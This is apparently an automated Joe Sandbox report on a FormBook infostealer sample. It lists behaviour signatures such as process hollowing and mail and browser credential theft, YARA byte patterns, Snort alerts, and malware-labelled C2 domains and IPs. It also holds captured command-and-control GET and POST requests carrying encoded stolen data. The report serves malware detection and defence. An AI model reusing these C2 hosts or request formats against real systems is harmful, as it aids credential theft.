Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Product24573.exe

Overview

General Information

Sample Name:Product24573.exe
Analysis ID:878554
MD5:0ba48f5e511aac79f954af60cec8a491
SHA1:d50e0f9ce108295a8810beb7b798b443ccb6da82
SHA256:b060f747e4aa941b42d475cf40290b6211911e1e949d8a2df0705660cd014996
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Product24573.exe (PID: 7112 cmdline: C:\Users\user\Desktop\Product24573.exe MD5: 0BA48F5E511AAC79F954AF60CEC8A491)
    • Product24573.exe (PID: 5932 cmdline: C:\Users\user\Desktop\Product24573.exe MD5: 0BA48F5E511AAC79F954AF60CEC8A491)
    • Product24573.exe (PID: 4692 cmdline: C:\Users\user\Desktop\Product24573.exe MD5: 0BA48F5E511AAC79F954AF60CEC8A491)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 2300 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b51:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1832f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16d9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ed9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Product24573.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.Product24573.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20df3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcbe2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.Product24573.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7ad:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fb9a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20b4d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Product24573.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Product24573.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x1fff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbde2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3130.185.109.7749700802031449 05/30/23-19:34:04.337520
          SID:2031449
          Source Port:49700
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3130.185.109.7749700802031453 05/30/23-19:34:04.337520
          SID:2031453
          Source Port:49700
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3130.185.109.7749700802031412 05/30/23-19:34:04.337520
          SID:2031412
          Source Port:49700
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Product24573.exeReversingLabs: Detection: 37%
          Source: Product24573.exeVirustotal: Detection: 53%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Product24573.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.antalyabfe.com/bpg5/www.antalyabfe.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/www.vns96.netti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/www.rt66omm.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.bizAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.comAvira URL Cloud: Label: malware
          Source: http://www.antalyabfe.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.gomarketing.infoAvira URL Cloud: Label: malware
          Source: http://www.42230.org/bpg5/www.42230.orgti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/www.gomarketing.infoti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.gomarketing.info/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.mysparexrewards.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.rt66omm.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.comAvira URL Cloud: Label: malware
          Source: http://www.thetowerbells.com/bpg5/www.thetowerbells.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.techwithsun.comAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.vns96.net/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.musicandgros.comAvira URL Cloud: Label: malware
          Source: http://www.techwithsun.com/bpg5/www.techwithsun.com9Avira URL Cloud: Label: malware
          Source: http://www.fabricadepack.fun/bpg5/Avira URL Cloud: Label: malware
          Source: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.jhg61.com/bpg5/www.jhg61.comti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.42230.orgAvira URL Cloud: Label: malware
          Source: http://www.musicandgros.com/bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5WAvira URL Cloud: Label: malware
          Source: http://www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: www.gomarketing.infoVirustotal: Detection: 7%Perma Link
          Source: www.musicandgros.comVirustotal: Detection: 10%Perma Link
          Source: musicandgros.comVirustotal: Detection: 7%Perma Link
          Machine Learning detection for sample
          Source: Product24573.exeJoe Sandbox ML: detected
          Source: Product24573.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Product24573.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: lJJaU.pdb source: Product24573.exe
          Source: Binary string: wntdll.pdbUGP source: Product24573.exe, 00000002.00000003.397760095.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000003.399612512.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.440146096.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.438342369.000000000082F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002F4F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002E30000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Product24573.exe, Product24573.exe, 00000002.00000003.397760095.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000003.399612512.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, Product24573.exe, 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.440146096.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000003.438342369.000000000082F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002F4F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650882125.0000000002E30000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: Product24573.exe, 00000002.00000002.440678675.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Product24573.exe, 00000002.00000002.438590358.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650765520.0000000000E10000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eex.pdb source: explorer.exe, 00000003.00000002.670229855.00007FFC1B351000.00000020.00000001.01000000.0000000A.sdmp
          Source: Binary string: lJJaU.pdbSHA256 source: Product24573.exe
          Source: Binary string: wlanext.pdbGCTL source: Product24573.exe, 00000002.00000002.440678675.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Product24573.exe, 00000002.00000002.438590358.0000000000CAA000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000006.00000002.650765520.0000000000E10000.00000040.80000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.berlinhealthweek.com
          Source: C:\Windows\explorer.exeDomain query: www.gomarketing.info
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.musicandgros.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49700 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49700 -> 130.185.109.77:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49700 -> 130.185.109.77:80
          Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
          Source: global trafficHTTP traffic detected: GET /bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA== HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5W HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 130.185.109.77 130.185.109.77
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1478Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 71 6a 6f 59 57 34 37 42 72 77 31 4d 45 32 6b 42 6c 4c 36 6d 44 78 30 44 74 4b 56 36 61 79 79 6e 69 44 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6c 4e 4a 33 58 28 50 77 77 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 5eb6=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8lNJ3X(PwwojCk1jMg).
          Source: global trafficHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 32 78 4f 6a 52 41 33 41 4c 51 6e 35 55 4b 36 44 6c 65 33 4d 74 7a 50 7a 32 51 79 54 78 7a 51 72 32 37 28 70 31 53 59 42 34 72 53 61 47 4e 68 65 6a 31 4a 33 70 56 54 6b 56 76 37 4c 79 43 71 7a 67 38 52 69 55 45 4d 4c 42 56 53 6d 28 4c 28 6f 54 51 32 51 50 6d 5a 64 32 52 74 48 7e 34 72 6f 58 44 4c 78 41 54 35 53 64 72 72 49 46 31 6b 59 39 38 4d 4e 45 63 55 4a 7a 39 72 34 67 6b 6f 54 58 4d 44 47 76 6e 55 37 31 55 68 7a 4a 54 46 56 53 42 50 64 77 56 6c 71 7a 6e 50 75 34 52 70 75 48 6e 34 42 54 34 55 6c 79 35 70 4b 4c 33 30 42 79 5a 33 46 72 77 57 2d 6d 32 41 39 54 30 4d 2d 7e 35 54 53 55 53 6e 4b 56 4c 4a 2d 62 54 4b 4a 6a 43 4e 48 4c 78 7e 67 6a 54 61 6b 45 59 78 41 71 73 76 67 65 77 6f 67 4c 6b 59 76 68 45 65 6d 42 5a 32 48 58 63 55 35 45 45 42 43 4e 69 62 31 59 37 4e 6d 71 45 79 38 67 7a 6f 6e 58 34 37 63 72 77 78 75 45 32 38 64 6c 4b 4c 44 41 43 4d 44 74 6f 74 36 58 42 61 6e 6a 7a 66 54 32 63 35 43 4a 54 69 4c 70 69 57 65 39 38 36 65 76 74 4a 79 4d 4a 72 58 73 73 59 52 70 50 34 67 52 56 35 63 51 62 51 62 47 79 54 34 4e 45 76 70 38 71 42 4f 52 4a 46 58 6d 44 63 79 64 61 44 5a 6e 4a 41 50 70 41 4f 5a 6e 31 63 44 44 64 77 45 76 53 34 4f 65 33 6e 41 42 56 74 61 49 6e 70 56 55 66 38 62 28 4f 59 7a 65 52 73 5a 6e 33 36 50 54 4e 63 6c 52 54 39 37 6d 39 54 61 6f 71 35 4f 70 42 77 55 34 62 38 65 51 4e 76 38 32 76 62 74 36 37 7a 5f 7e 78 79 33 52 75 6b 58 56 39 56 4e 50 65 6b 45 49 46 66 6a 7e 57 42 5a 68 73 48 56 50 31 30 54 78 76 35 44 49 52 6e 7a 45 37 64 74 50 67 7a 42 6d 4a 47 6d 4a 35 38 7a 68 37 55 77 36 47 31 6f 51 46 44 76 73 47 4b 73 7a 4e 33 30 6b 73 49 41 43 5a 45 6a 45 55 61 77 72 32 61 4f 42 6f 77 6d 4a 42 74 62 31 62 4e 4f 4f 61 56 71 6e 46 61 33 31 31 31 59 73 47 50 5a 79 2d 42 76 67 6c 6d 6f 6e 4f 71 4f 6f 32 53 4f 65 48 66 4d 58 4c 46 53 35 68 61 62 71 30 39 4c 4a 6b 36 77 35 2d 6f 67 4e 70 53 37 43 2d 71 6c 61 31 74 77 42 42 78 52 4c 70 35 70 32 4d 75 6b 4c 6f 34 73 31 77 42 4e 38 50 39 53 72 68 6c 44 6a 79 46 66 58 48 37 59 55 52 4f 33 46 4d 4d 78 6d 4f 67 38 78 63 78 76 67 32 35 56 39 50 50 71 39 35 53 7a 55 71 55 4e 57 38 51 64 56 34 4d 70 55 33 37 4c 4b 49 50 6b 4a 4e 30 59 71 47 68 49 69 65 56 4a 4a 61 50 77 5a 37 45 71 36 6b 41 43 48 50 35 31 28 42 72 4e 38 6f 73 47 74 34 45 52 71 53 78 46 6e 6d 4f 38 61 45 57 71 78 6b 4c 72 7a 7a 78 56 43 56 66 46 53 7a 67 38 74 32 32 54 77 59 76 62 79 42 44 63 45 6c 72 75 33 51 42 68 73 68 31 58 4d 59 6e 73 73 38 42 75 77 70 7a 5f 54 51 5a 4b 33 5f 50 52 55 75 70 4b 6f 6c 50 68 50 45 50 58 56 70 6d 75 34 45 57 66 48 67 4f 36 71 4b 6e 73 68 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Tue, 30 May 2023 17:34:04 GMTContent-Type: text/htmlContent-Length: 168Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
